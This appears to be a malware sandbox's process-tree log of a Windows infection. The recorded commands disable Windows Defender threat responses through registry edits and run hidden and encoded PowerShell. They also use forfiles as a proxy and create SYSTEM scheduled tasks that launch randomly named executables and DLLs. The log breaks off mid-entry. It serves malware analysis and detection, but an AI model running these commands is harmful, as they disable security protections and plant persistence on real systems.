  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5264
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:484
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5516
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5500
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6064
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 10:33:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\bwkhQoi.exe\" GH /UQmCdidaM 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:3624
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1620
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:3432

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:5576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:5220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5264

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:5384

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\kUqwojQ.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\kUqwojQ.exe GH /HyaMdidUQ 385118 /S
1⤵
PID:5176
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:2176
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:1160
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:2908
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4528
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:1768
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5948
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1776
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:3172
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4116
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5532
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5864
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:3352
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:8
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1884
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4988
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4496
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:3516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:3856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:1244
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5104
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2852
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5496
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\lJBZuU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2068
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\vpEpbxg.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6108
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:1316
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5396
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\FQPTFSW.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3988
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\BVMpGcS.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1752
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\XYlixnW.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\mcIJxgp.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 09:17:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\gqfhkSgh\bpCNAsm.dll\",#1 /RgdidQmY 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5816
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:5356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:3036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:792

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\bwkhQoi.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\bwkhQoi.exe GH /UQmCdidaM 385118 /S
1⤵
PID:1124
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5128
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5504
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4000
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4996
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5456
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5200
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5552
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:3856
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3144
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5096
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1296
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:3864
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5980
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1436
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:1504
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5244
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:3600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:5772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:3748
- - C:\Windows\SysWOW64\forfiles.exe
